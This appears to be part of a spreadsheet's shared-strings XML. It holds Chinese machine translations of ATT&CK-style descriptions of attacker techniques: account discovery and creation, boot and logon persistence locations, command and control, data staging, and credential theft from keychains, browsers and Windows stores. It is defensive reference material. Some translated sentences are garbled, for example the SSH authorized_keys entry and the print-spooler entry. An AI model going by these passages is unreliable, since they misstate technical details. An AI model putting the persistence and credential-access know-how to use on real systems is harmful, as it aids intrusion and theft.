    <t>攻击者可能试图获取本地系统帐户的列表。这些信息可以帮助攻击者确定系统上存在哪些本地帐户，以帮助后续行为。</t>
  </si>
  <si>
    <t>攻击者可能试图获取域帐户列表。这些信息可以帮助攻击者确定存在哪些域帐户来帮助后续行为。</t>
  </si>
  <si>
    <t>攻击者可能会试图获取电子邮件地址和帐户的列表。攻击者可能会尝试转储Exchange地址列表，如全局地址列表（GAL）。</t>
  </si>
  <si>
    <t>攻击者可能会试图获取云账户列表。云帐户是由组织创建和配置的，供用户、远程支持、服务使用，或用于管理云服务提供商或SaaS应用程序中的资源。</t>
  </si>
  <si>
    <t>攻击者可能会操纵帐户以保持对受害者系统的访问。帐户操纵可能包括任何保留攻击者对受损帐户访问权限的操作，例如修改凭据或权限组。这些操作还可能包括旨在颠覆安全策略的帐户活动，例如执行迭代密码更新以绕过密码持续时间策略并保留受损凭据的生命。为了创建或操纵帐户，攻击者必须在系统或域上拥有足够的权限。</t>
  </si>
  <si>
    <t>攻击者可以将攻击者控制的凭据添加到云帐户，以保持对环境中的受害者帐户和实例的持久访问。</t>
  </si>
  <si>
    <t>攻击者可以授予额外的权限级别，如ReadPermission或FullAccess，以保持对攻击者控制的电子邮件帐户的持久访问。Add-MailboxPermission PowerShell cmdlet可在内部部署Exchange和基于云的服务Office 365中获得，用于向邮箱添加权限。</t>
  </si>
  <si>
    <t>攻击者可以将全局管理员角色添加到攻击者控制的帐户，以保持对Office 365租户的持久访问。如果拥有足够的权限，受损帐户可以通过全局管理员角色获得几乎无限的数据和设置访问权限（包括重置其他管理员密码的能力）。</t>
  </si>
  <si>
    <t>攻击者可能会修改SSH授权密钥文件，以在受害主机上保持持久性。Linux发行版和macOS通常使用基于密钥的身份验证来保护用于远程管理的SSH会话的身份验证过程。SSH中的authorized_keys文件指定了可用于登录到为其配置文件的用户帐户的SSH密钥。该文件通常位于用户的主目录下的&lt;user home&gt;/。ssh/authorized_密钥。可以编辑RSA的“是”和“SSH”命令，以确保用户的“身份验证”和“SSH”命令的“公钥”都已启用。SSH配置文件通常位于/etc/SSH/sshd_config下。</t>
  </si>
  <si>
    <t>攻击者可以购买、租赁或租赁可在瞄准过程中使用的基础设施。存在各种各样的基础设施来承载和协调攻击者的行动。基础设施解决方案包括物理或云服务器、域和第三方web服务。此外，僵尸网络还可以出租或购买。</t>
  </si>
  <si>
    <t>攻击者可能会购买可以在瞄准过程中使用的域名。域名是人类可读的名称，用于表示一个或多个IP地址。它们可以购买，或者在某些情况下，可以免费获得。</t>
  </si>
  <si>
    <t>攻击者可能会设置自己的域名系统（DNS）服务器，以便在目标锁定期间使用。在泄露后活动期间，攻击者可能会利用DNS流量执行各种任务，包括命令和控制（例如：应用层协议）。攻击者可以选择配置和运行自己的DNS服务器来支持操作，而不是劫持现有的DNS服务器。</t>
  </si>
  <si>
    <t>攻击者可能会租用虚拟专用服务器（VPS），以便在锁定目标时使用。有各种各样的云服务提供商将虚拟机/容器作为服务出售。通过使用VPS，攻击者可以使其难以在物理上将作战行动与自己联系起来。云基础设施的使用还可以让攻击者更容易地快速调配、修改和关闭其基础设施。</t>
  </si>
  <si>
    <t>攻击者可能会购买、租赁或租用可在瞄准过程中使用的物理服务器。使用服务器可以让攻击者进行部署、启动和执行操作。在事后妥协活动中，攻击者可能会利用服务器执行各种任务，包括指挥和控制。攻击者可以选择配置和运行自己的服务器，以支持作战，而不是破坏第三方服务器或租用虚拟专用服务器。</t>
  </si>
  <si>
    <t>攻击者可以注册可在目标锁定期间使用的web服务。存在各种流行的网站供攻击者注册基于web的服务，这些服务可能在攻击者生命周期的后期阶段被滥用，例如在命令和控制（web服务）或通过web服务进行过滤期间。使用谷歌（Google）或推特（Twitter）等公共服务，让攻击者更容易隐藏在预期的噪音中。通过利用web服务，攻击者可能会使物理上将操作与他们联系起来变得困难。</t>
  </si>
  <si>
    <t>攻击者可能会扫描受害者，寻找在瞄准过程中可以使用的漏洞。漏洞扫描通常会检查目标主机/应用程序（例如：软件和版本）的配置是否与攻击者可能试图使用的特定漏洞的目标一致。</t>
  </si>
  <si>
    <t>中间的攻击者</t>
  </si>
  <si>
    <t>攻击者可能会尝试使用中间攻击者（AiTM）技术将自己定位在两个或多个网络设备之间，以支持后续行为，如网络嗅探或传输数据操纵。通过滥用可确定网络流量（如ARP、DNS、LLMNR等）的常见网络协议的功能，攻击者可能会迫使设备通过攻击者控制的系统进行通信，以便收集信息或执行其他操作。</t>
  </si>
  <si>
    <t>通过响应LLMNR/NBT-NS网络流量，攻击者可以欺骗权威来源进行名称解析，以强制与攻击者控制的系统通信。此活动可用于收集或转发认证材料。</t>
  </si>
  <si>
    <t>攻击者可能会毒害地址解析协议（ARP）缓存，以便在两个或多个联网设备的通信中定位自己。此活动可用于启用后续行为，如网络嗅探或传输数据操纵。</t>
  </si>
  <si>
    <t>攻击者可以使用应用层协议进行通信，通过与现有流量混合来避免检测/网络过滤。发送到远程系统的命令，以及这些命令的结果，将嵌入到客户端和服务器之间的协议通信中。</t>
  </si>
  <si>
    <t>攻击者可以使用与web流量相关的应用层协议进行通信，通过与现有流量混合来避免检测/网络过滤。发送到远程系统的命令，以及这些命令的结果，将嵌入到客户端和服务器之间的协议通信中。</t>
  </si>
  <si>
    <t>攻击者可能会使用与传输文件相关的应用层协议进行通信，以通过与现有流量混合来避免检测/网络过滤。发送到远程系统的命令，以及这些命令的结果，将嵌入到客户端和服务器之间的协议通信中。</t>
  </si>
  <si>
    <t>攻击者可能会使用与电子邮件传递相关的应用层协议进行通信，以避免与现有流量混合，从而进行检测/网络过滤。发送到远程系统的命令，以及这些命令的结果，将嵌入到客户端和服务器之间的协议通信中。</t>
  </si>
  <si>
    <t>攻击者可以使用域名系统（DNS）应用层协议进行通信，通过与现有流量混合来避免检测/网络过滤。发送到远程系统的命令，以及这些命令的结果，将嵌入到客户端和服务器之间的协议通信中。</t>
  </si>
  <si>
    <t>攻击者可能试图获取打开的应用程序窗口列表。窗口列表可以传达有关如何使用系统的信息，或者为键盘记录器收集的信息提供上下文。</t>
  </si>
  <si>
    <t>攻击者可能会压缩和/或加密过滤前收集的数据。压缩数据有助于混淆收集的数据，并将通过网络发送的数据量降至最低。加密可以用来隐藏正在被过滤的信息，使其不被检测到，或者在防御者检查时使过滤不那么明显。</t>
  </si>
  <si>
    <t>攻击者可以使用第三方实用程序压缩或加密过滤前收集的数据。存在许多可以存档数据的实用程序，包括7-Zip、WinRAR和WinZip。大多数实用程序都包含加密和/或压缩数据的功能。</t>
  </si>
  <si>
    <t>攻击者可能会压缩或加密在使用第三方库进行过滤之前收集的数据。存在许多可以存档数据的库，包括Python rarfile、libzip和zlib。大多数库都包含加密和/或压缩数据的功能。</t>
  </si>
  <si>
    <t>攻击者可以使用自定义方法压缩或加密过滤前收集的数据。攻击者可能会选择使用定制的归档方法，例如使用XOR加密或在没有外部库或实用程序引用的情况下实现的流密码。还使用了著名压缩算法的定制实现。</t>
  </si>
  <si>
    <t>攻击者可以利用计算机的外围设备（例如麦克风和网络摄像头）或应用程序（例如语音和视频通话服务）来捕获音频记录，以便监听敏感对话以收集信息。</t>
  </si>
  <si>
    <t>一旦在一个系统或网络中建立起来，攻击者就可以使用自动技术来收集内部数据。执行此技术的方法可能包括使用命令和脚本解释器，以特定的时间间隔搜索和复制符合设置条件（如文件类型、位置或名称）的信息。这种功能也可以内置到远程访问工具中。</t>
  </si>
  <si>
    <t>攻击者可能会在收集过程中收集数据后，通过使用自动处理来过滤数据，例如敏感文档。</t>
  </si>
  <si>
    <t>攻击者可能会利用流量镜像在受损的网络基础设施上自动进行数据过滤。流量镜像是某些网络设备的本机功能，用于网络分析，可以配置为复制流量并转发到一个或多个目的地，以便由网络分析仪或其他监控设备进行分析。</t>
  </si>
  <si>
    <t>攻击者可能会滥用BITS作业来持续执行或清理恶意有效负载。Windows后台智能传输服务（BITS）是一种通过组件对象模型（COM）公开的低带宽异步文件传输机制。BITS通常由更新程序、信使和其他希望在后台运行（使用可用空闲带宽）而不中断其他网络应用程序的应用程序使用。文件传输任务被实现为BITS作业，其中包含一个或多个文件操作的队列。</t>
  </si>
  <si>
    <t>攻击者可能会将系统设置配置为在系统引导或登录期间自动执行程序，以在受损系统上保持持久性或获得更高级别的权限。操作系统可能具有在系统启动或帐户登录时自动运行程序的机制。这些机制可能包括自动执行程序，这些程序被放置在特别指定的目录中，或被存储配置信息的存储库（如Windows注册表）引用。攻击者可以通过修改或扩展内核的特性来实现相同的目标。</t>
  </si>
  <si>
    <t>攻击者可以通过将程序添加到启动文件夹或使用注册表运行键引用它来实现持久性。在注册表或启动文件夹中的“运行键”中添加一个条目将导致用户登录时执行引用的程序。这些程序将在用户的上下文中执行，并具有帐户的相关权限级别。</t>
  </si>
  <si>
    <t>当系统启动时，攻击者可能会滥用身份验证包来执行DLL。Windows身份验证包DLL由本地安全机构（LSA）进程在系统启动时加载。它们支持操作系统的多个登录过程和多个安全协议。</t>
  </si>
  <si>
    <t>攻击者可能会滥用时间提供程序在系统启动时执行DLL。Windows时间服务（W32Time）支持跨域和域内的时间同步。W32时间提供者负责从硬件/网络资源中检索时间戳，并将这些值输出到其他网络客户端。</t>
  </si>
  <si>
    <t>当用户登录时，攻击者可能会滥用Winlogon的功能来执行DLL和/或可执行文件。Winlogon。exe是一个Windows组件，负责登录/注销时的操作，以及由Ctrl-Alt-Delete触发的安全注意序列（SAS）。HKLM\Software[\Wow6432Node\]\Microsoft\Windows NT\CurrentVersion\Winlogon\和HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\中的注册表项用于管理支持Winlogon的其他帮助程序和功能。</t>
  </si>
  <si>
    <t>当系统启动时，攻击者可能会滥用安全支持提供商（SSP）来执行DLL。Windows SSP DLL在系统启动时加载到本地安全机构（LSA）进程中。一旦加载到LSA中，SSP DLL就可以访问存储在Windows中的加密密码和明文密码，例如任何登录用户的域密码或智能卡PIN。</t>
  </si>
  <si>
    <t xml:space="preserve">攻击者可能会修改内核，以便在系统启动时自动执行程序。可加载内核模块（LKM）是可以根据需要加载和卸载到内核中的代码片段。它们扩展了内核的功能，而无需重新启动系统。例如，一种类型的模块是设备驱动程序，它允许内核访问连接到系统的硬件。 </t>
  </si>
  <si>
    <t>攻击者可能会修改plist文件，以便在用户登录时自动运行应用程序。从Mac OS X 10.7（Lion）开始，用户可以指定在重新启动后用户登录到其计算机时重新打开的特定应用程序。虽然这通常是通过图形用户界面（GUI）逐个应用完成的，但在~/Library/Preferences/com上也有包含此信息的属性列表文件（plist）。苹果登录窗口。plist和~/Library/Preferences/ByHost/com。苹果登录窗口。*。普利斯特。</t>
  </si>
  <si>
    <t>攻击者可以修改或添加LSASS驱动程序，以在受损系统上获得持久性。Windows安全子系统是一组组件，用于管理和实施计算机或域的安全策略。本地安全机构（LSA）是负责本地安全策略和用户身份验证的主要组件。LSA包括多个与各种其他安全功能相关联的动态链接库（DLL），所有这些功能都在LSA子系统服务（LSASS）LSASS的上下文中运行。exe进程。</t>
  </si>
  <si>
    <t>攻击者可以创建或编辑快捷方式，以便在系统引导或用户登录期间运行程序。快捷方式或符号链接是一种引用其他文件或程序的方式，当系统启动进程单击或执行快捷方式时，这些文件或程序将被打开或执行。</t>
  </si>
  <si>
    <t>攻击者可能会在系统引导期间使用端口监视器运行攻击者提供的DLL，以实现持久性或权限提升。可以通过AddMonitor API调用设置端口监视器，以设置要在启动时加载的DLL。此DLL可位于C:\Windows\System32中，并将由后台打印程序服务spoolsv加载。exe，开机时。这部电影很有趣。exe进程也在系统级权限下运行。或者，如果权限允许将该DLL的完全限定路径名写入HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors，则可以加载任意DLL。</t>
  </si>
  <si>
    <t>作为建立持久性的一部分，攻击者可以修改属性列表文件（plist文件）以执行其代码。Plist文件由macOS应用程序用于存储应用程序和服务的属性和配置设置。应用程序使用信息列表文件、信息。plist，告诉操作系统如何在运行时使用键和值形式的结构化元数据处理应用程序。PLIST文件以XML格式和基于苹果核心基础DTD的格式，可以以文本或二进制格式保存。</t>
  </si>
  <si>
    <t>攻击者可能会滥用打印处理器在系统引导期间运行恶意DLL，以实现持久性和/或权限提升。打印处理器是由打印后台处理程序服务spoolsv加载的DLL。exe，在引导过程中。</t>
  </si>
  <si>
    <t>攻击者可能会修改XDG autostart条目，以便在系统引导期间执行程序或命令。与XDG兼容的Linux桌面环境为XDG autostart条目实现功能。这些条目将允许应用程序在用户登录后的桌面环境启动期间自动启动。默认情况下，XDG autostart条目存储在/etc/XDG/autostart或~/中。config/autostart目录，并有一个。桌面文件扩展名。</t>
  </si>
  <si>
    <t>攻击者可以通过向本地计算机的活动设置中添加注册表项来实现持久性。活动安装是一种Windows机制，用于在用户登录时执行程序。存储在注册表项中的值将在用户登录计算机后执行。这些程序将在用户的上下文中执行，并具有帐户的相关权限级别。</t>
  </si>
  <si>
    <t>攻击者可以在用户登录时添加登录项以获得持久性或升级权限。登录项是用户登录时自动启动的应用程序、文档、文件夹或服务器连接。可以通过共享文件列表或服务管理框架添加登录项。共享文件列表登录项可以使用脚本语言（如AppleScript）设置，而服务管理框架使用API调用SMLoginItemSetEnabled。</t>
  </si>
  <si>
    <t>攻击者可能会使用启动或登录初始化时自动执行的脚本来建立持久性。初始化脚本可用于执行管理功能，这些功能通常可执行其他程序或向内部日志服务器发送信息。这些脚本可能因操作系统的不同而有所不同，无论是本地应用还是远程应用。</t>
  </si>
  <si>
    <t>攻击者可以使用登录初始化时自动执行的Windows登录脚本来建立持久性。Windows允许在特定用户或用户组登录系统时运行登录脚本。这是通过向HKCU\Environment\UserInitMprLogonScript注册表项添加脚本路径来实现的。</t>
  </si>
  <si>
    <t>攻击者可以使用登录初始化时自动执行的macOS登录脚本来建立持久性。macOS允许在特定用户登录系统时执行登录脚本（称为登录挂钩）。登录钩子告诉Mac OS X在用户登录时执行特定脚本，但与启动项不同，登录钩子作为提升的根用户执行。</t>
  </si>
  <si>
    <t>攻击者可以使用登录初始化时自动执行的网络登录脚本来建立持久性。可以使用Active Directory或组策略对象分配网络登录脚本。这些登录脚本以分配给它们的用户的权限运行。根据网络中的系统，初始化其中一个脚本可以应用于多个系统，或者可能应用于所有系统。</t>
  </si>
  <si>
    <t>攻击者可以通过修改在类Unix系统启动期间执行的RC脚本来建立持久性。这些文件允许系统管理员在启动时为不同的运行级别映射和启动自定义服务。RC脚本需要root权限才能修改。</t>
  </si>
  <si>
    <t>攻击者可以使用启动初始化时自动执行的启动项来建立持久性。启动项在启动过程的最后阶段执行，包含shell脚本或其他可执行文件，以及系统用于确定所有启动项的执行顺序的配置信息。</t>
  </si>
  <si>
    <t>攻击者可能会列举浏览器书签，以了解更多有关受损主机的信息。浏览器书签可能会显示用户的个人信息（例如：银行网站、兴趣、社交媒体等），以及服务器、工具/仪表盘或其他相关基础设施等内部网络资源的详细信息。</t>
  </si>
  <si>
    <t>攻击者可能会滥用Internet浏览器扩展来建立对受害者系统的持久访问。浏览器扩展或插件是可以添加功能和自定义Internet浏览器方面的小程序。它们可以直接安装，也可以通过浏览器的应用商店安装，通常对浏览器可以访问的所有内容都有访问权限。</t>
  </si>
  <si>
    <t>作为各种浏览器会话劫持技术的一部分，攻击者可能会利用浏览器软件中的安全漏洞和固有功能来更改内容、修改用户行为和拦截信息。</t>
  </si>
  <si>
    <t>当密码未知或获得密码哈希时，攻击者可能会使用暴力技术来访问帐户。在不知道一个或多个帐户的密码的情况下，攻击者可能会使用重复或迭代机制系统地猜测密码。可以通过与服务的交互来强制输入密码，该服务将检查这些凭证的有效性，或者根据之前获取的凭证数据（如密码哈希）离线。</t>
  </si>
  <si>
    <t>事先不知道系统或环境中的合法凭据的攻击者可能会猜测密码以尝试访问帐户。在不知道帐户密码的情况下，攻击者可能会选择使用重复或迭代机制系统地猜测密码。在操作过程中，攻击者可能会在事先不知道系统或环境密码的情况下，通过使用常见密码列表猜测登录凭据。密码猜测可能会也可能不会考虑目标公司关于密码复杂性的策略，或者使用可能会在多次尝试失败后锁定帐户的策略。</t>
  </si>
  <si>
    <t>当获得密码哈希等凭证材料时，攻击者可能会使用密码破解来尝试恢复可用凭证，如明文密码。OS凭据转储用于获取密码散列，只有在无法通过散列的情况下，才能获得攻击者的信任。系统地猜测用于计算散列的密码的技术是可用的，或者攻击者可以使用预先计算的彩虹表来破解散列。破解散列通常在目标网络之外的攻击者控制系统上完成。成功破解的散列所产生的明文密码可用于登录帐户有权访问的系统、资源和服务。</t>
  </si>
  <si>
    <t>攻击者可能会对许多不同的帐户使用一个或一个小的常用密码列表，试图获取有效的帐户凭据。密码喷洒使用一个密码（例如“Password01”），或一小部分常用密码，这些密码可能与域的复杂性策略相匹配。尝试使用该密码登录网络上的多个不同帐户，以避免在强制使用多个密码的单个帐户时通常会发生的帐户锁定。</t>
  </si>
  <si>
    <t>攻击者可以使用从无关帐户的违规转储中获得的凭据，通过凭据重叠来访问目标帐户。有时，当网站或服务遭到破坏，用户帐户凭据被访问时，大量用户名和密码对会被转储到网上。这些信息可能对试图通过利用用户在个人和商业账户中使用相同密码的趋势来破坏账户的攻击者有用。</t>
  </si>
  <si>
    <t>攻击者可以直接在主机上构建容器映像，以绕过监控从公共注册表检索恶意映像的防御。远程构建请求可能会被发送到Docker API，该API包含一个Dockerfile，该Dockerfile从公共或本地注册表中提取一个普通的基本映像，例如alpine，然后在其上构建一个自定义映像。</t>
  </si>
  <si>
    <t>攻击者可能会从应用程序内部或之间复制信息的用户那里收集存储在剪贴板中的数据。</t>
  </si>
  <si>
    <t>攻击者可能会试图发现基础设施即服务（IaaS）环境中可用的资源。这包括实例、虚拟机和快照等计算服务资源，以及存储和数据库服务等其他服务的资源。</t>
  </si>
  <si>
    <t>攻击者可能会使用带有被盗凭证的云服务仪表板GUI，从可操作的云环境中获取有用的信息，例如特定的服务、资源和功能。例如，GCP指挥中心可用于查看所有资产、潜在安全风险的发现，以及运行其他查询，例如查找公共IP地址和开放端口。</t>
  </si>
  <si>
    <t>攻击者在获得访问权限后可能会尝试枚举系统上运行的云服务。这些方法可能不同于平台即服务（PaaS）、基础设施即服务（IaaS）或软件即服务（SaaS）。许多服务遍及各种云提供商，包括持续集成和持续交付（CI/CD）、Lambda功能、Azure AD等。</t>
  </si>
  <si>
    <t>攻击者可能会枚举云存储基础设施中的对象。攻击者可能会在自动发现过程中使用这些信息来塑造后续行为，包括从云存储请求所有或特定对象。与本地主机上的文件和目录发现类似，在识别可用存储服务（即云基础设施发现）后，攻击者可能会访问存储在云基础设施中的内容/对象。</t>
  </si>
  <si>
    <t>攻击者可能会滥用命令和脚本解释器来执行命令、脚本或二进制文件。这些接口和语言提供了与计算机系统交互的方式，是许多不同平台的共同特征。大多数系统都带有一些内置的命令行界面和脚本功能，例如，macOS和Linux发行版包括一些Unix Shell，而Windows安装包括Windows命令Shell和PowerShell。</t>
  </si>
  <si>
    <t>攻击者可能会滥用PowerShell命令和脚本来执行。PowerShell是Windows操作系统中包含的一个强大的交互式命令行界面和脚本环境。攻击者可以使用PowerShell执行许多操作，包括发现信息和执行代码。示例包括可用于运行可执行文件的Start Process cmdlet和在本地或远程计算机上运行命令的Invoke Command cmdlet（尽管使用PowerShell连接到远程系统需要管理员权限）。</t>
  </si>
  <si>
    <t>攻击者可能会滥用AppleScript执行死刑。AppleScript是一种macOS脚本语言，旨在通过名为AppleEvents的应用程序间消息控制应用程序和部分操作系统。这些AppleEvent消息可以独立发送，也可以使用AppleScript轻松编写脚本。这些事件可以定位打开的窗口，发送击键，并在本地或远程与几乎所有打开的应用程序进行交互。</t>
  </si>
  <si>
    <t>攻击者可能会滥用Windows命令shell执行。Windows命令shell（cmd）是Windows系统上的主要命令提示符。Windows命令提示符可用于控制系统的几乎任何方面，不同的命令子集需要不同的权限级别。可以通过SSH等远程服务远程调用命令提示符。</t>
  </si>
  <si>
    <t>攻击者可能会滥用Unix shell命令和脚本来执行。Unix shell是Linux和macOS系统上的主要命令提示符，尽管Unix shell的许多变体（例如sh、bash、zsh等）取决于特定的操作系统或发行版。Unix shell可以控制系统的各个方面，某些命令需要提升权限。</t>
  </si>
  <si>
    <t>攻击者可能会滥用Visual Basic（VB）执行。VB是Microsoft创建的一种编程语言，可通过Windows API与许多Windows技术（如组件对象模型和本机API）进行互操作。虽然被标记为遗留，没有计划未来的发展，但VB在中是集成和支持的。NET框架和跨平台。净核心。</t>
  </si>
  <si>
    <t>攻击者可能会滥用Python命令和脚本来执行。Python是一种非常流行的脚本/编程语言，具有执行许多功能的能力。Python可以从命令行（通过Python.exe解释器）或通过脚本（.py）交互执行，这些脚本可以编写并分发到不同的系统。Python代码也可以编译成二进制可执行文件。</t>
  </si>
  <si>
    <t>攻击者可能会滥用各种JavaScript实现来执行。JavaScript（JS）是一种独立于平台的脚本语言（在运行时及时编译），通常与网页中的脚本关联，尽管JS可以在浏览器之外的运行时环境中执行。</t>
  </si>
  <si>
    <t>攻击者可能会滥用网络设备上的脚本或内置命令行解释器（CLI）来执行恶意命令和有效负载。CLI是用户和管理员与设备交互以查看系统信息、修改设备操作或执行诊断和管理功能的主要手段。CLI通常包含不同命令所需的各种权限级别。</t>
  </si>
  <si>
    <t>攻击者可以使用可移动媒体在可能断开连接的网络上的受损主机之间执行命令和控制，以在系统之间传输命令。这两个系统都需要被破坏，首先，通过可移动介质复制，互联网连接的系统可能会被破坏，其次，通过横向移动。命令和文件将从断开连接的系统传输到攻击者可以直接访问的互联网连接系统。</t>
  </si>
  <si>
    <t>攻击者可能会利用目标锁定期间可以使用的服务破坏帐户。对于包含社会工程的运营，在线角色的利用可能很重要。攻击者可能会损害现有的客户，而不是创建和培养客户（即建立客户）。如果潜在受害者与受损角色有关系或了解受损角色，那么利用现有角色可能会对其产生一定程度的信任。</t>
  </si>
  <si>
    <t>攻击者可能会破坏目标锁定期间可以使用的社交媒体帐户。对于包含社会工程的运营，在线角色的利用可能很重要。与创建和培养社交媒体档案（即社交媒体账户）不同，攻击者可能会破坏现有的社交媒体账户。如果潜在受害者与受损角色有关系或了解受损角色，那么利用现有角色可能会对其产生一定程度的信任。</t>
  </si>
  <si>
    <t>攻击者可能会破坏目标期间可以使用的电子邮件帐户。攻击者可以使用受损的电子邮件帐户来推进其操作，例如利用它们进行信息钓鱼或网络钓鱼。如果潜在受害者与受损的电子邮件帐户有关系或了解受损的角色，那么利用现有的角色可能会对潜在受害者产生一定程度的信任。受损的电子邮件帐户也可用于购买基础设施（例如：域）。</t>
  </si>
  <si>
    <t>攻击者可能会修改客户端软件二进制文件，以建立对系统的持久访问。客户端软件允许用户访问服务器提供的服务。常见的客户端软件类型有SSH客户端、FTP客户端、电子邮件客户端和web浏览器。</t>
  </si>
  <si>
    <t>攻击者可能会破坏目标确定期间可以使用的第三方基础设施。基础设施解决方案包括物理或云服务器、域和第三方web服务。攻击者可能会破坏基础设施，并在攻击者生命周期的其他阶段使用它，而不是购买、租赁或租用基础设施。此外，攻击者可能会破坏许多机器，形成他们可以利用的僵尸网络。</t>
  </si>
  <si>
    <t>攻击者可能会劫持可在瞄准过程中使用的域和/或子域。域名注册劫持是指未经原注册人许可，擅自更改域名注册的行为。攻击者可以访问被列为域所有者的人的电子邮件帐户。然后，攻击者可以声称他们忘记了密码，以便对域注册进行更改。其他可能性包括社会工程、域名注册帮助台，以获得对账户的访问权，或利用续签过程中的漏洞。</t>
  </si>
  <si>
    <t>攻击者可能会破坏目标确定期间可以使用的第三方DNS服务器。在泄露后活动期间，攻击者可能会利用DNS流量执行各种任务，包括命令和控制（例如：应用层协议）。攻击者可能会破坏第三方DNS服务器以支持操作，而不是建立自己的DNS服务器。</t>
  </si>
  <si>
    <t>攻击者可能会破坏目标确定期间可使用的第三方虚拟专用服务器（VPS）。有各种各样的云服务提供商将虚拟机/容器作为服务出售。攻击者可能会破坏第三方实体购买的VPS。通过将VPS用作基础设施，攻击者可能会使其难以在物理上将操作与自己联系起来。</t>
  </si>
  <si>
    <t>攻击者可能会破坏目标确定期间可以使用的第三方服务器。使用服务器可以让攻击者进行部署、启动和执行操作。在事后妥协活动中，攻击者可能会利用服务器执行各种任务，包括指挥和控制。与购买服务器或虚拟专用服务器不同，攻击者可能会破坏第三方服务器以支持作战。</t>
  </si>
  <si>
    <t>攻击者可能会破坏许多第三方系统，形成一个僵尸网络，可以在瞄准过程中使用。僵尸网络是一个由受损系统组成的网络，可以被指示执行协调的任务。与从引导者/压力源服务购买/租用僵尸网络不同，攻击者可能会通过破坏大量第三方系统来构建自己的僵尸网络。攻击者还可能接管现有的僵尸网络，例如将机器人重定向到攻击者控制的C2服务器。利用僵尸网络，攻击者可能会执行后续活动，如大规模网络钓鱼或分布式拒绝服务（DDoS）。</t>
  </si>
  <si>
    <t>攻击者可能会滥用容器管理服务在容器内执行命令。容器管理服务（如Docker守护程序、Kubernetes API服务器或kubelet）可能允许远程管理环境中的容器。</t>
  </si>
  <si>
    <t>攻击者可能会试图发现容器环境中可用的容器和其他资源。其他资源可能包括映像、部署、POD、节点和其他信息，如集群的状态。</t>
  </si>
  <si>
    <t>攻击者可以创建一个帐户来维护对受害者系统的访问。有了足够的访问级别，创建此类帐户可用于建立二级认证访问，而不需要在系统上部署持久远程访问工具。</t>
  </si>
  <si>
    <t>攻击者可以创建一个本地帐户来维护对受害者系统的访问。本地帐户是组织为用户、远程支持、服务或单个系统或服务上的管理而配置的帐户。如果有足够的访问级别，可以使用net user/add命令创建本地帐户。在macOS系统上，dscl-create命令可用于创建本地帐户。</t>
  </si>
  <si>
    <t>攻击者可以创建一个域帐户来维护对受害者系统的访问。域帐户是由Active Directory域服务管理的帐户，在这些帐户中，访问和权限是跨属于该域的系统和服务配置的。域帐户可以包括用户、管理员和服务帐户。如果有足够的访问级别，可以使用net user/add/domain命令创建域帐户。</t>
  </si>
  <si>
    <t>攻击者可能会创建一个云帐户来维护对受害者系统的访问。有了足够的访问级别，这些帐户可用于建立二级认证访问，而不需要在系统上部署持久远程访问工具。</t>
  </si>
  <si>
    <t>作为持久性的一部分，攻击者可能会创建或修改系统级进程，以重复执行恶意有效负载。当操作系统启动时，它们可以启动执行后台系统功能的进程。在Windows和Linux上，这些系统进程称为服务。在macOS上，启动进程（称为启动守护进程和启动代理）被运行以完成系统初始化并加载特定于用户的参数。</t>
  </si>
  <si>
    <t>作为持久性的一部分，攻击者可能会创建或修改启动代理，以重复执行恶意有效负载。用户登录时，将启动按用户启动进程，该进程将从/System/Library/LaunchAgents、/Library/LaunchAgents和~/Library/LaunchAgents中的属性列表（.plist）文件中加载每次按需启动用户代理的参数。属性列表文件使用标签、ProgramArguments和RunAtLoad键来标识启动代理的名称、可执行位置和执行时间。安装Launch Agent通常是为了执行程序更新、在登录时启动用户指定的程序或执行其他开发人员任务。</t>
  </si>
  <si>
    <t>作为持久性的一部分，攻击者可能会创建或修改systemd服务以重复执行恶意有效负载。systemd service manager通常用于管理后台守护进程（也称为服务）和其他系统资源。Systemd是许多Linux发行版上的默认初始化（init）系统，从Debian 8、Ubuntu 15.04、CentOS 7、RHEL 7、Fedora 15开始，它取代了包括SysVinit和Upstart在内的旧版Int系统，同时与前面提到的Int系统保持向后兼容。</t>
  </si>
  <si>
    <t>作为持久性的一部分，攻击者可能会创建或修改Windows服务以重复执行恶意有效负载。当Windows启动时，它会启动称为服务的程序或应用程序，以执行后台系统功能。Windows服务配置信息（包括服务可执行程序或恢复程序/命令的文件路径）存储在Windows注册表中。可以使用sc.exe和Reg等实用程序修改服务配置。</t>
  </si>
  <si>
    <t>作为持久性的一部分，攻击者可能会创建或修改启动守护程序以执行恶意有效负载。启动守护进程是用于与macOS使用的服务管理框架Launchd交互的plist文件。启动守护程序需要提升权限才能安装，在登录前为系统上的每个用户执行，并在后台运行，无需用户交互。在macOS初始化启动期间，launchd进程从/system/Library/LaunchDaemons/和/Library/LaunchDaemons/中的plist文件中加载按需启动系统级守护程序的参数。所需的启动守护进程参数包括标识任务的标签、提供可执行文件路径的程序，以及指定任务运行时间的RunAtLoad。启动守护进程通常用于提供对共享资源的访问、软件更新或执行自动化任务。</t>
  </si>
  <si>
    <t>攻击者可以搜索通用密码存储位置以获取用户凭据。密码存储在系统的多个位置，具体取决于持有凭据的操作系统或应用程序。还有一些特定的应用程序存储密码，以便于用户管理和维护。一旦获得凭证，它们就可以用于执行横向移动和访问受限信息。</t>
  </si>
  <si>
    <t>攻击者可以从系统中收集钥匙链存储数据以获取凭证。密钥链是macOS的内置方式，用于跟踪用户的密码和许多服务和功能的凭据，如WiFi密码、网站、安全笔记、证书和Kerberos。钥匙链文件位于~/Library/Keychains/、/Library/Keychains/和/Network/Library/Keychains/中。默认情况下内置在macOS中的安全命令行实用程序提供了一种管理这些凭据的有用方法。</t>
  </si>
  <si>
    <t>攻击者可以获得根访问权限（允许他们读取securityd的内存），然后他们可以在相对较少的尝试中通过扫描内存找到正确的密钥序列来解密用户的登录密钥链。这为攻击者提供了用户、WiFi、邮件、浏览器、证书、安全笔记等的所有明文密码。</t>
  </si>
  <si>
    <t>攻击者可以通过读取特定于目标浏览器的文件从web浏览器获取凭据。Web浏览器通常会保存网站用户名和密码等凭据，以便将来不需要手动输入。Web浏览器通常以加密格式将凭证存储在凭证存储中；然而，存在从web浏览器中提取明文凭证的方法。</t>
  </si>
  <si>
    <t>攻击者可以从Windows凭据管理器获取凭据。凭据管理器将用于登录通过NTLM或Kerberos请求身份验证的网站、应用程序和/或设备的凭据存储在凭据储物柜（以前称为Windows Vault）中。</t>
  </si>
  <si>
